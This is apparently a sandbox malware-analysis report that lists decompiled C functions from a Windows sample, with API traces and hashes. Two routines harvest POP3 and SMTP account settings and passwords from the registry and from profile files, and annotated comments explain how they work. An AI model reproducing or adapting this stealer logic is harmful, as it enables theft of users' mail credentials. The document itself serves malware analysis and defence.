         *_t7 =  *_t7 & 0x00000000;                        // clear the stored handle
    }
    return _t5;
}

Addresses: 0x004047fb 0x00404803 0x00404809 0x0040480d 0x00404810 0x00404816 0x00404816 0x0040481a

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                        • Opcode ID: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                                                                                                                                                                        • Instruction ID: a9857fde68bfdf8991c7705c8330266d98638ef7b5ff2aef664b3e01c595234a
                                                                                                                                                                        • Opcode Fuzzy Hash: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                                                                                                                                                                        • Instruction Fuzzy Hash: 54D012B61003118FDB209F14EC0CBE133ECAF40312F15C4B9E951A7156C3349540CA58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405EEE(CHAR* _a4) {
	void* _t3;

	_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
	return _t3;
}

Addresses: 0x00405f00, 0x00405f06

APIs
• CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409CBE,00000000,00000000,00000000,0041344F,0041344F,?,0040BB7D,0041344F), ref: 00405F00
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
• Instruction ID: bc29cfa666e89d0cfbdb77cae37961506820f0e8ddae25b665a114bfacacae09
• Opcode Fuzzy Hash: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
• Instruction Fuzzy Hash: 1BC092B0660200BEFE208A20AC0AF77299DD780705F1084207A04E40E0C2A18C008624
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040F402(struct HINSTANCE__* _a4, CHAR* _a8) {

	EnumResourceNamesA(_a4, _a8, E0040F37C, 0); // executed
	return 1;
}

Addresses: 0x0040f411, 0x0040f41a

APIs
• EnumResourceNamesA.KERNEL32(?,?,0040F37C,00000000), ref: 0040F411
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
• Opcode ID: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
• Instruction ID: fad5876d7f8aa1560905c766ba53a11d3010bfcf0403834e812c2ac38a9eeaed
• Opcode Fuzzy Hash: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
• Instruction Fuzzy Hash: 88C09B31594341D7C711DF208C05F1BFEE5BB5C702F108C3D7151D40E4C77180189615
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004070C5(signed int* __esi) {
	int _t2;
	void* _t3;

	_t3 =  *__esi;
	if(_t3 != 0xffffffff) {
		_t2 = FindClose(_t3); // executed
		 *__esi =  *__esi | 0xffffffff;
		return _t2;
	}
	return 0;
}

Addresses: 0x004070c5, 0x004070cc, 0x004070cf, 0x004070d5, 0x00000000, 0x004070d5, 0x004070d8

APIs
• FindClose.KERNELBASE(?,00406FDF,?,?,00000000,?,00411327,*.oeaccount,0041141B,?,00000104), ref: 004070CF
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
• Instruction ID: fb6f9d5761a39194e530e87d941626cbb459cc8d01e30c2ad93bf7984ca40ca8
• Opcode Fuzzy Hash: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
• Instruction Fuzzy Hash: 77C09230510A01ABD23C5F389C5A46A7BA0AF593323B48F6CE0F3D24F0E73899868A04
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040EF05(void* __esi) {
	struct HINSTANCE__* _t6;
	int _t7;

	_t6 =  *(__esi + 8);
	 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
	if(_t6 != 0) {
		_t7 = FreeLibrary(_t6); // executed
		 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
		return _t7;
	}
	return _t6;
}

Addresses: 0x0040ef05, 0x0040ef08, 0x0040ef0e, 0x0040ef11, 0x0040ef17, 0x00000000, 0x0040ef17, 0x0040ef1b

APIs
• FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
• Instruction ID: 3414d520a0ca87f174e03c7aae78275fe345844bef97b548c291c08909f1245b
• Opcode Fuzzy Hash: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
• Instruction Fuzzy Hash: 62C04C31210702DBEB218B12C849753B7E8AB40317F40CC68945695494D77DE454CE18
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00406155(CHAR* _a4) {
                                                                                                                                                                        				long _t4;
                                                                                                                                                                        
                                                                                                                                                                        				_t4 = GetFileAttributesA(_a4); // executed
                                                                                                                                                                        				return 0 | _t4 != 0xffffffff;
                                                                                                                                                                        			}




                                                                                                                                                                        0x00406159
                                                                                                                                                                        0x00406169

APIs
• GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
• Instruction ID: f305466360af1034a225c08a34d2ddc6697937c487c9f6746c0aa1a011dcbbf5
• Opcode Fuzzy Hash: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
• Instruction Fuzzy Hash: CCB012753100005BCB080B349C4A0CD35506F446327204B3CB033C00F0D720CE60BA00
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
    // Decompiled wrapper around RegOpenKeyExA. 0x20019 is KEY_READ. The report's
    // API trace for this function shows it opening HKEY_LOCAL_MACHINE (0x80000002)
    // \Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders.
    // Returns the LSTATUS value (0 on success); the opened handle is written to *_a12.
    long E0040F1B0(void* _a4, char* _a8, void** _a12) {
        long _t4;

        _t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
        return _t4;
    }

APIs
• RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
• Instruction ID: 6c28280414aaf847a098fae787e0885161fd0282473b9be1e1f1fd42ed515737
• Opcode Fuzzy Hash: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
• Instruction Fuzzy Hash: 41C09B35544301FFDE118F40ED05F09BFA1AB88B05F008414B244240B1C2718414EB17
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
    // Decompiled credential-harvesting routine. It opens the mail account key _a8
    // under _a4 and reads the POP3 and SMTP settings stored there, including the
    // password values; this is the behaviour the report flags as "Tries to steal
    // Mail credentials (via file / registry access)". The roles of the helpers
    // (E0040F1F1 string read, E0040F1CA numeric read, E0040F214 password read,
    // E00401CD7 password post-processing, E004023C6 account recording) are
    // inferred from the call sites and are not stated by the report.
    long E00402D74(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
        signed int _v8;
        char _v20;
        char _v24;
        char _v152;
        char _v280;
        char _v408;
        intOrPtr _v412;
        char _v668;
        char _v796;
        intOrPtr _v800;
        char _v928;
        char _v940;
        char _v952;
        char _v956;
        char _v1084;
        char _v1212;
        char _v1340;
        intOrPtr _v1344;
        char _v1600;
        char _v1728;
        intOrPtr _v1732;
        char _v1860;
        char _v1872;
        long _t59;          // was void* in the decompiler output; holds the RegOpenKeyExA status
        signed int _t60;
        intOrPtr _t63;
        void* _t113;
        signed int _t116;   // added: used below but left undeclared by the decompiler
        signed int _t117;   // added: used below but left undeclared by the decompiler
        void* _t118;
        void* _t122;
        char* _t123;
        void* _t141;

        _t141 = __fp0;
        _t118 = __edi;
        _t113 = __ecx;
        _t59 = E0040F1B0(_a4, _a8,  &_a8);          // open the account key (KEY_READ); the handle overwrites _a8
        if(_t59 == 0) {
            _t60 = 0x7d;                           // 125: capacity of the two password buffers read below
            _a4 = _t60;
            _v8 = _t60;
            E00402197( &_v1872);                   // initialise the SMTP record
            E00402197( &_v940);                    // initialise the POP record
            _t63 = 2;
            _v1732 = _t63;
            _v800 = _t63;
            // The three pushes supply the remaining arguments of the following
            // E0040F1F1 call, i.e. E0040F1F1(_t122, _t113, _a8, "DisplayName", &_v928).
            _push( &_v928);
            _push("DisplayName");
            _push(_a8);
            _v1344 = 4;
            _t122 = 0x7f;                          // 127: maximum string length for the value reads
            _v412 = 1;
            E0040F1F1(_t122, _t113);
            // Incoming (POP3) account settings
            E0040F1F1(_t122, _t113, _a8, "EmailAddress",  &_v796);
            E0040F1F1(_t122, _t113, _a8, "PopAccount",  &_v408);
            E0040F1F1(_t122, _t113, _a8, "PopServer",  &_v668);
            E0040F1CA(_t113, _a8, "PopPort",  &_v24);
            E0040F1CA(_t113, _a8, "PopLogSecure",  &_v20);
            if(E0040F214(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                _a4 = _a4 & 0x00000000;            // read failed: record a zero-length password
            }
            strcpy( &_v1860,  &_v928);             // copy display name and e-mail address into the SMTP record
            strcpy( &_v1728,  &_v796);
            // Outgoing (SMTP) account settings
            E0040F1F1(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
            E0040F1F1(_t122, _t113, _a8, "SMTPServer",  &_v1600);
            E0040F1CA(_t113, _a8, "SMTPPort",  &_v956);
            E0040F1CA(_t113, _a8, "SMTPLogSecure",  &_v952);
            if(E0040F214(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                _v8 = _v8 & 0x00000000;            // read failed: record a zero-length password
            }
            _t123 = (char*)_t118 + 0xa9c;          // string at offset 0xa9c of the block __edi points to
            strcpy( &_v152, _t123);
            strcpy( &_v1084, _t123);
            _t116 = _a4;
            if(_a4 > 0) {
                E00401CD7( &_v280, _t116);         // post-process the POP password bytes when one was read
            }
            if(_v408 != 0) {
                E004023C6( &_v940, _t141, _t118);  // record the POP account if an account name was present
            }
            _t117 = _v8;
            if(_v8 > 0) {
                E00401CD7( &_v1212, _t117);        // same for the SMTP password
            }
            if(_v1340 != 0) {
                E004023C6( &_v1872, _t141, _t118); // record the SMTP account if an account name was present
            }
            return RegCloseKey(_a8);
        }
        return _t59;                               // RegOpenKeyExA error status: key could not be opened
    }
                                                                                                                                                                        0x00402f17
                                                                                                                                                                        0x00402f19
                                                                                                                                                                        0x00402f19
                                                                                                                                                                        0x00402f1d
                                                                                                                                                                        0x00402f2b
                                                                                                                                                                        0x00402f38
                                                                                                                                                                        0x00402f3d
                                                                                                                                                                        0x00402f46
                                                                                                                                                                        0x00402f4e
                                                                                                                                                                        0x00402f4e
                                                                                                                                                                        0x00402f5a
                                                                                                                                                                        0x00402f63
                                                                                                                                                                        0x00402f63
                                                                                                                                                                        0x00402f68
                                                                                                                                                                        0x00402f6d
                                                                                                                                                                        0x00402f75
                                                                                                                                                                        0x00402f75
                                                                                                                                                                        0x00402f81
                                                                                                                                                                        0x00402f8a
                                                                                                                                                                        0x00402f8a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402f92
                                                                                                                                                                        0x00402f99

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                          • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                          • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                                                                                                                                                                          • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00402E8B
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402E9E
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00402F2B
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 00402F38
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402F92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$QueryValue$CloseOpen
                                                                                                                                                                        • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                        • API String ID: 4127491968-1534328989
                                                                                                                                                                        • Opcode ID: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                                                                                                                                                                        • Instruction ID: 3eb728c69d877055b887914c3e29035f7ad0c3b4bfdbdde50966da93315596c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 315139B1910218BEDB21EF51CD06BDE777CAF04304F1081B7BA08B6191E7789B989F58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004033B1(void* __edi, void* __fp0, intOrPtr _a4) {
                                                                                                                                                                        				char _v276;
                                                                                                                                                                        				char _v404;
                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                        				char _v664;
                                                                                                                                                                        				intOrPtr _v796;
                                                                                                                                                                        				char _v936;
                                                                                                                                                                        				char _v1208;
                                                                                                                                                                        				char _v1336;
                                                                                                                                                                        				intOrPtr _v1340;
                                                                                                                                                                        				char _v1596;
                                                                                                                                                                        				intOrPtr _v1728;
                                                                                                                                                                        				char _v1868;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                                         				void* _t35;
                                                                                                                                                                         				void* _t48; /* holds the saved __fp0 value, used below */
                                                                                                                                                                        
                                                                                                                                                                        				_t48 = __fp0;
                                                                                                                                                                        				E00402197( &_v936);
                                                                                                                                                                        				E00402197( &_v1868);
                                                                                                                                                                        				_t23 = 4;
                                                                                                                                                                        				_v796 = _t23;
                                                                                                                                                                        				_v1728 = _t23;
                                                                                                                                                                        				_v408 = _t23;
                                                                                                                                                                        				_v1340 = 1;
                                                                                                                                                                        				E00403371(__edi, "SMTPServer",  &_v664);
                                                                                                                                                                        				E00403371(__edi, "ESMTPUsername",  &_v404);
                                                                                                                                                                        				E00403371(__edi, "ESMTPPassword",  &_v276);
                                                                                                                                                                        				E00403371(__edi, "POP3Server",  &_v1596);
                                                                                                                                                                        				E00403371(__edi, "POP3Username",  &_v1336);
                                                                                                                                                                        				_t35 = E00403371(__edi, "POP3Password",  &_v1208);
                                                                                                                                                                        				if(_v276 != 0) {
                                                                                                                                                                        					E00403392( &_v276);
                                                                                                                                                                        					_t35 = E004023C6( &_v936, __fp0, _a4);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v1208 != 0) {
                                                                                                                                                                        					E00403392( &_v1208);
                                                                                                                                                                        					return E004023C6( &_v1868, _t48, _a4);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t35;
                                                                                                                                                                        			}


                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                        • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                        • API String ID: 3963849919-1658304561
                                                                                                                                                                        • Opcode ID: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                                                                                                                                                                        • Instruction ID: ad4fe9f44f4ec6704836124f0b121ca839780027ba1e1250375890495da90f14
                                                                                                                                                                        • Opcode Fuzzy Hash: 597409f585b18e28f020b58d473e644e7b11ec3109896bedd661c4ad4da97b59
                                                                                                                                                                        • Instruction Fuzzy Hash: F421BEB1C0022C6EDB61EF118D86FED7B7C9F45705F4000ABAA48B6092DB7C5BC59E59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E0040FEB1(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				void* _v11;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v13;
                                                                                                                                                                        				char _v19;
                                                                                                                                                                        				char _v20;
	char _v21;
	char _v22;
	char _v23;
	char _v24;
	signed int _v28;
	short _v30;
	short _v32;
	char* _v36;
	char* _v40;
	intOrPtr _v44;
	intOrPtr _v48;
	intOrPtr _v52;
	char* _v56;
	char* _v60;
	char* _v64;
	char _v76;
	void _v88;
	intOrPtr _v92;
	char* _v96;
	char* _v100;
	intOrPtr _v104;
	char* _v108;
	char* _v112;
	char* _v116;
	char* _v120;
	char* _v124;
	intOrPtr _v128;
	char* _v132;
	char* _v136;
	char* _v140;
	char* _v144;
	char* _v148;
	char* _v152;
	intOrPtr _v156;
	char* _v160;
	char* _v164;
	char* _v168;
	intOrPtr _v172;
	char* _v176;
	char* _v180;
	char* _v184;
	char* _v188;
	char* _v192;
	char* _v196;
	intOrPtr _v200;
	char* _v204;
	char* _v208;
	char* _v212;
	char* _v216;
	char* _v220;
	char* _v224;
	char* _v228;
	intOrPtr _v232;
	char* _v236;
	char* _v240;
	char* _v244;
	char* _v248;
	char* _v252;
	intOrPtr _v256;
	char* _v260;
	char* _v264;
	char* _v268;
	char* _v272;
	char* _v276;
	char* _v280;
	intOrPtr _v284;
	char* _v288;
	char* _v292;
	char* _v296;
	intOrPtr _v300;
	char* _v304;
	char* _v308;
	char* _v312;
	char* _v316;
	char* _v320;
	char* _v324;
	intOrPtr _v328;
	char* _v332;
	char* _v336;
	char* _v340;
	char* _v344;
	char* _v348;
	char* _v352;
	char* _v356;
	char* _v360;
	char* _v364;
	intOrPtr _v368;
	intOrPtr _v372;
	char* _v376;
	char* _v380;
	intOrPtr _v384;
	char* _v388;
	char* _v392;
	intOrPtr _v396;
	intOrPtr _v400;
	char* _v404;
	char* _v408;
	intOrPtr _v412;
	char* _v416;
	char* _v420;
	char* _v424;
	char* _v428;
	intOrPtr _v432;
	intOrPtr _v436;
	char* _v440;
	intOrPtr _v444;
	char* _v448;
	char* _v452;
	char* _v456;
	char* _v460;
	intOrPtr _v464;
	char* _v468;
	intOrPtr* _t200;
	char* _t202;
	char _t203;
	int _t205;
	int _t206;
	intOrPtr _t209;
	char* _t211;
	int _t213;
	void _t216;
	char _t220;
	void _t221;
	int _t226;
	signed int _t231;
	intOrPtr* _t232;
	void _t237;
	void* _t238;
	void* _t240;
	void* _t245;
	signed int _t246;
	signed int _t249;
	int _t250;
	void* _t251;
	int _t252;
	void* _t254;
	void* _t255;
	void* _t256;

	_v64 = "amp;";
	_v60 = "lt;";
	_v56 = "gt;";
	_v52 = "quot;";
	_v48 = "nbsp;";
	_v44 = "apos;";
	_v24 = 0x26;
	_v23 = 0x3c;
	_v22 = 0x3e;
	_v21 = 0x22;
	_v20 = 0x20;
	_v19 = 0x27;
	_v468 = "iexcl;";
	_v464 = "cent;";
	_v460 = "pound;";
	_v456 = "curren;";
	_v452 = "yen;";
	_v448 = "brvbar;";
	_v444 = "sect;";
	_v440 = "uml;";
	_v436 = "copy;";
	_v432 = "ordf;";
	_v428 = "laquo;";
	_v424 = "not;";
	_v420 = "shy;";
	_v416 = "reg;";
	_v412 = "macr;";
	_v408 = "deg;";
	_v404 = "plusmn;";
	_v400 = "sup2;";
	_v396 = "sup3;";
	_v392 = "acute;";
	_v388 = "micro;";
	_v384 = "para;";
	_v380 = "middot;";
	_v376 = "cedil;";
	_v372 = "sup1;";
	_v368 = "ordm;";
	_v364 = "raquo;";
	_v360 = "frac14;";
	_v356 = "frac12;";
	_v352 = "frac34;";
	_v348 = "iquest;";
	_v344 = "Agrave;";
	_v340 = "Aacute;";
	_v336 = "Acirc;";
	_v332 = "Atilde;";
	_v328 = "Auml;";
	_v324 = "Aring;";
	_v320 = "AElig;";
	_v316 = "Ccedil;";
	_v312 = "Egrave;";
	_v308 = "Eacute;";
	_v304 = "Ecirc;";
	_v300 = "Euml;";
                                                                                                                                                                        				_v296 = "Igrave;";
                                                                                                                                                                        				_v292 = "Iacute;";
                                                                                                                                                                        				_v288 = "Icirc;";
                                                                                                                                                                        				_v284 = "Iuml;";
                                                                                                                                                                        				_v280 = "ETH;";
                                                                                                                                                                        				_v276 = "Ntilde;";
                                                                                                                                                                        				_v272 = "Ograve;";
                                                                                                                                                                        				_v268 = "Oacute;";
                                                                                                                                                                        				_v264 = "Ocirc;";
                                                                                                                                                                        				_v260 = "Otilde;";
                                                                                                                                                                        				_v256 = "Ouml;";
                                                                                                                                                                        				_v252 = "times;";
                                                                                                                                                                        				_v248 = "Oslash;";
                                                                                                                                                                        				_v244 = "Ugrave;";
                                                                                                                                                                        				_v240 = "Uacute;";
                                                                                                                                                                        				_v236 = "Ucirc;";
                                                                                                                                                                        				_v232 = "Uuml;";
                                                                                                                                                                        				_v228 = "Yacute;";
                                                                                                                                                                        				_v224 = "THORN;";
                                                                                                                                                                        				_v220 = "szlig;";
                                                                                                                                                                        				_v216 = "agrave;";
                                                                                                                                                                        				_v212 = "aacute;";
                                                                                                                                                                        				_v208 = "acirc;";
                                                                                                                                                                        				_v204 = "atilde;";
                                                                                                                                                                        				_t200 = _a8;
                                                                                                                                                                        				_v28 = _v28 | 0xffffffff;
                                                                                                                                                                        				_t231 = 0;
                                                                                                                                                                        				_t254 = 0;
                                                                                                                                                                        				_v200 = "auml;";
                                                                                                                                                                        				_v196 = "aring;";
                                                                                                                                                                        				_v192 = "aelig;";
                                                                                                                                                                        				_v188 = "ccedil;";
                                                                                                                                                                        				_v184 = "egrave;";
                                                                                                                                                                        				_v180 = "eacute;";
                                                                                                                                                                        				_v176 = "ecirc;";
                                                                                                                                                                        				_v172 = "euml;";
                                                                                                                                                                        				_v168 = "igrave;";
                                                                                                                                                                        				_v164 = "iacute;";
                                                                                                                                                                        				_v160 = "icirc;";
                                                                                                                                                                        				_v156 = "iuml;";
                                                                                                                                                                        				_v152 = "eth;";
                                                                                                                                                                        				_v148 = "ntilde;";
                                                                                                                                                                        				_v144 = "ograve;";
                                                                                                                                                                        				_v140 = "oacute;";
                                                                                                                                                                        				_v136 = "ocirc;";
                                                                                                                                                                        				_v132 = "otilde;";
                                                                                                                                                                        				_v128 = "ouml;";
                                                                                                                                                                        				_v124 = "divide;";
                                                                                                                                                                        				_v120 = "oslash;";
                                                                                                                                                                        				_v116 = "ugrave;";
                                                                                                                                                                        				_v112 = "uacute;";
                                                                                                                                                                        				_v108 = "ucirc;";
                                                                                                                                                                        				_v104 = "uuml;";
                                                                                                                                                                        				_v100 = "yacute;";
                                                                                                                                                                        				_v96 = "thorn;";
                                                                                                                                                                        				_v92 = "yuml;";
                                                                                                                                                                        				if( *_t200 == 0) {
                                                                                                                                                                        					L45:
                                                                                                                                                                        					_t202 = _a4 + _t231;
                                                                                                                                                                        					 *_t202 = 0;
                                                                                                                                                                        					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                                                                                                                                        						return _t202;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *((char*)(_t202 - 1)) = 0;
                                                                                                                                                                        						return _t202;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_a12 == 0xffffffff || _a12 > _t254) {
                                                                                                                                                                        					_t232 = _t254 + _t200;
                                                                                                                                                                        					_t203 =  *_t232;
                                                                                                                                                                        					_v13 = _t203;
                                                                                                                                                                        					if(_t203 != 0x26) {
                                                                                                                                                                        						L33:
                                                                                                                                                                        						if(_a16 == 0 || _t203 > 0x20) {
                                                                                                                                                                        							 *((char*)(_t231 + _a4)) = _t203;
                                                                                                                                                                        							_t231 = _t231 + 1;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							if(_t231 != _v28) {
                                                                                                                                                                        								 *((char*)(_t231 + _a4)) = 0x20;
                                                                                                                                                                        								_t231 = _t231 + 1;
                                                                                                                                                                        								if(_a20 != 0 && _t231 == 1) {
                                                                                                                                                                        									_t231 = 0;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_v28 = _t231;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t254 = _t254 + 1;
                                                                                                                                                                        						L43:
                                                                                                                                                                        						_t200 = _a8;
                                                                                                                                                                        						if( *((char*)(_t254 + _t200)) != 0) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t249 = 0;
                                                                                                                                                                        					_v36 = _t232 + 1;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
                                                                                                                                                                        						_v8 = _t205;
                                                                                                                                                                        						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
                                                                                                                                                                        						_t256 = _t256 + 0x10;
                                                                                                                                                                        						if(_t206 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t249 = _t249 + 1;
                                                                                                                                                                        						if(_t249 < 6) {
                                                                                                                                                                        							continue;
